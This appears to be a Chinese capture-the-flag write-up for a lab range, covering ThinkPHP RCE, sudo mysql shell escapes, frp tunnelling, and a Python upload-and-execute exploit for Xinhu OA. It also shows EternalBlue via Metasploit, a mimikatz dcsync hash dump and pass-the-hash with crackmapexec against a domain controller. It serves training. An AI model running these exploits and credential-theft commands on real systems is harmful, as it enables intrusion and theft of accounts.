春秋云境仿真场景WP:Initial

WriteUp 3周前 admin
42 0 0



点击蓝字 关注我们

春秋云境仿真场景WP:Initial

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

靶场介绍

Initial是一套较为简单的靶场,该靶场较为简单,涉及内网流量代理,frp、proxifier的使用以及横向hash传递攻击,该靶场只有一个flag分布在不同靶机上。

拿到外网shell

开局给ip用nmap扫描端口

春秋云境仿真场景WP:Initial

开启80,22端口访问发现为thinkphp框架尝试RCE

春秋云境仿真场景WP:Initial

春秋云境仿真场景WP:Initial

flag01

进去发现是www-data权限

春秋云境仿真场景WP:Initial

sudo -l发现mysql可以免密使用

春秋云境仿真场景WP:Initial

查找第一个flag

sudo mysql -e '! find / -name flag*'

春秋云境仿真场景WP:Initial

抓取flag

sudo mysql -e '! cat /root/flag/flag01.txt'

春秋云境仿真场景WP:Initial

flag02

ifconfig发现内网网段 172.22.1.0/24

春秋云境仿真场景WP:Initial

fscan扫描

春秋云境仿真场景WP:Initial

内网基本信息

172.22.1.2 DC域控

172.22.1.21 MS17-010永恒之蓝

172.22.1.18 信呼OA系统

frp代理

服务器:frps.ini绑定本地5987端口

春秋云境仿真场景WP:Initial

目标主机:frpc.ini

春秋云境仿真场景WP:Initial

proxifier代理(地址为服务器ip)

春秋云境仿真场景WP:Initial

弱口令 admin admin123

春秋云境仿真场景WP:Initial

信呼OAexp

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

拿到上传路径getshell

春秋云境仿真场景WP:Initial

prixifier代理蚁剑流量

春秋云境仿真场景WP:Initial

拿到flag02

春秋云境仿真场景WP:Initial

flag03

kali代理流量

vim/etc/proxychains4.conf

春秋云境仿真场景WP:Initial

hash传递攻击

msf攻击

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

春秋云境仿真场景WP:Initial

调用mimikatz抓取hash

load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)

春秋云境仿真场景WP:Initial

使用crackmapexec攻击访问DC

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type UsersAdministratorflagflag03.txt"

春秋云境仿真场景WP:Initial

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

春秋云境仿真场景WP:Initial



!感谢03Scx12师傅投稿!



欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】

#


企业简介   


赛克艾威 – 网络安全解决方案提供商


       北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,提供全面的安全解决方案和专业的技术服务,帮助客户保护数字资产和网络环境的安全。


安全评估|渗透测试|漏洞扫描|安全巡检

代码审计|钓鱼演练|应急响应|安全运维

重大时刻安保|企业安全培训

春秋云境仿真场景WP:Initial

联系方式

电话|010-86460828 

官网|https://sechub.com.cn

春秋云境仿真场景WP:Initial

关注我们

春秋云境仿真场景WP:Initial
春秋云境仿真场景WP:Initial
春秋云境仿真场景WP:Initial

公众号:sechub安全

哔哩号:SecHub官方账号


原文始发于微信公众号(SecHub网络安全社区):春秋云境仿真场景WP:Initial

版权声明:admin 发表于 2024年5月29日 上午9:15。
转载请注明:春秋云境仿真场景WP:Initial | CTF导航

相关文章